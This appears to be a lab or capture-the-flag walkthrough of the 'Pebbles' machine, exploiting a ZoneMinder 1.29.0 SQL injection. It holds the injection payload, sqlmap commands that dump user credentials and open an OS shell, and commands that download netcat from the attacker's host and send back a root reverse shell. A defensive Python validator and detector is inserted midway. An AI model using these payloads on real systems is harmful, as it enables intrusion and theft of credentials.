# Pebbles

## Information Gathering

### Service Enumeration

`nmapAutomator.sh -H 192.168.85.52 -t full`

`nmapAutomator.sh -H 192.168.85.52 -t vulns`

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadDepA_067DRLj3O6E%2F48d97856a5ef43529a5005a82d551226.png?alt=media\&token=bf649595-06c5-4b7b-a846-88f3ed65299d)

### HTTP

Port 80 hosts a web application.

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadDi8O5CW73VW33Z75%2F80f84f8f57074fad9dc2c2947cf163aa.png?alt=media\&token=497821c6-d04c-41f8-bf8a-3834220d3773)

`gobuster dir -u http://192.168.85.52 -w /usr/share/dirb/wordlists/common.txt -k -x .txt,.php --threads 50`

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadDlJry0AuJLs3A0WS%2F98b508bc3513474f9551fd3d8ba51dca.png?alt=media\&token=c43158ad-fa5a-45d5-bc65-898692661643)

Using a larger wordlist:

`gobuster dir -u http://192.168.85.52 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -k -x .txt,.php --threads 100`

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadDpicgMBqpOdFlXJs%2F6bed5bc2ca774815acb95de65006c457.png?alt=media\&token=26ffeb09-f656-4433-a218-8fb410ada039)

We have a ZoneMinder console (v1.29.0).

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadDtxJOCSonpaLvfch%2Fac06be358d81452596baff86d11f8300.png?alt=media\&token=54ad8e11-51d9-49aa-a253-53e8088c9135)

Port 8080 contains another HTTP service.

`gobuster dir -u http://192.168.85.52:8080 -w /usr/share/dirb/wordlists/common.txt -k -x .txt,.php --threads 50`

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadE-GD9B8xvNqOwqvh%2F47a90d5dbb324e9c80cad5026bbf975f.png?alt=media\&token=010d3e86-b1b5-4323-8e72-dd6ab7d196be)

There is a `hello.php`.

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadE1x9nNhNTR5nMNzJ%2Fc769faeb21b0474384c91eabb8f7b6bc.png?alt=media\&token=10686ad0-22a4-4475-adee-d76cb733f2cc)

## Exploitation

The ZoneMinder version identified above (v1.29.0) has a known SQL injection vulnerability:

<https://www.exploit-db.com/exploits/41239>

The `limit` parameter appears to be vulnerable to stacked queries. Sending the following POST payload:

`view=request&request=log&task=query&limit=100;SELECT SLEEP(5)#&minTime=5`

makes the server sleep for 5 seconds.

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadE5EP9YhCP2MKcU9M%2Fc964409c24e74e04a20dd3d2f610147b.png?alt=media\&token=238ea2b9-8008-4487-90a7-1ec4dccd0f09)

This is a time-based blind SQL injection: a true condition makes the response sleep, a false condition returns immediately.
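As an added defensive illustration (not ZoneMinder's code, and not part of the original writeup), the block below shows the input handling that would have stopped this payload before it reached SQL, plus a detection check that flags the same log-query POST bodies; the `Logs` table and `TimeKey` column names are assumed.

```python
import re
from urllib.parse import unquote_plus

# Whitelist for the log-query 'limit' parameter: a short positive decimal integer only.
# A value such as "100;SELECT SLEEP(5)#" fails this check before any SQL is built.
LIMIT_RE = re.compile(r"[1-9][0-9]{0,5}")

def parse_limit(raw: str) -> int:
    if not LIMIT_RE.fullmatch(raw):
        raise ValueError(f"limit must be a positive decimal integer, got {raw!r}")
    return int(raw)

def limit_is_valid(raw: str) -> bool:
    try:
        parse_limit(raw)
        return True
    except ValueError:
        return False

def build_log_query(limit: int):
    # Hardened form: the limit is bound as a parameter, never spliced into SQL
    # text. Table and column names are assumed for illustration.
    return "SELECT * FROM Logs ORDER BY TimeKey DESC LIMIT ?", (limit,)

def parse_body(body: str) -> dict:
    # Minimal x-www-form-urlencoded parser that splits on '&' only, so a ';'
    # inside a value survives instead of being treated as a second separator.
    params = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params

def flag_suspicious_limit(body: str) -> bool:
    # Detection: True if a log-query POST body carries a non-numeric limit.
    q = parse_body(body)
    is_log_query = (q.get("view") == ["request"] and q.get("request") == ["log"]
                    and q.get("task") == ["query"])
    return is_log_query and any(not limit_is_valid(v) for v in q.get("limit", []))

# Constructed sample POST bodies (not captured traffic); the third is URL-encoded.
SAMPLE_BODIES = [
    "view=request&request=log&task=query&limit=100&minTime=5",
    "view=request&request=log&task=query&limit=100;SELECT SLEEP(5)#&minTime=5",
    "view=request&request=log&task=query&limit=100%3BSELECT+SLEEP%285%29%23&minTime=5",
    "view=console&limit=100;SELECT SLEEP(5)#",
]
def scan(bodies):
    return [b for b in bodies if flag_suspicious_limit(b)]
```

Only the two log-query bodies with a non-numeric `limit` are flagged; the same value on an unrelated view is ignored, which keeps the check specific to the vulnerable endpoint.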

We can automate the blind SQL injection using `sqlmap`.

`sqlmap http://192.168.133.52/zm/index.php --data="view=request&request=log&task=query&limit=100&minTime=5" -D zm --tables --threads 5`

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadEB1vNACiOrPuXUwY%2F3eecdd45a2704cddaaa5fdb4dc863094.png?alt=media\&token=bb5a8435-99d4-435a-8c81-c14b4455c24b)

`sqlmap http://192.168.133.52/zm/index.php --data="view=request&request=log&task=query&limit=100&minTime=5" -D zm -T Users -C Username,Password --dump --threads 5`

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadEDlGYS35JFrk381l%2Fdb401a0a624748cfb5e3a09da1caded7.png?alt=media\&token=c26f89de-cdd4-42bf-95c8-4e75c6eb479d)

We can achieve RCE using the `--os-shell` option.

`sqlmap http://192.168.133.52/zm/index.php --data="view=request&request=log&task=query&limit=100&minTime=5" --os-shell`

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadEHGWyq-pqCjDgtTc%2F0b50a04b17b94ea797c059370605c084.png?alt=media\&token=f642aec1-7cbc-46ef-a079-de860502ed39)

```
# Fetch a netcat binary from our host, make it executable, and connect back
# to our listener on port 3305 with a shell attached.
wget "http://192.168.49.133/nc" -O /tmp/nc
chmod +x /tmp/nc
/tmp/nc -e /bin/bash 192.168.49.133 3305
```

**Two details mattered here: the callback port 3305, and the location of the `nc` binary (`/tmp/nc`).**

On our listening machine, we get a root shell.

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadEaAAa8zt1Tp5c-sX%2F72e0d008acfc43e79d022509fea3aaa0.png?alt=media\&token=d4070b1d-fbc5-47ca-9c5c-ba4d969a28d9)

Upgrade to an interactive shell: `python -c 'import pty;pty.spawn("/bin/bash")'`

Proof:

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadEeMEQ-3LZ6mjnskd%2F86b04a6d492b4824bb14e8e7c57119d5.png?alt=media\&token=7d9c22b5-7a74-498d-9250-b12c660c9d61)
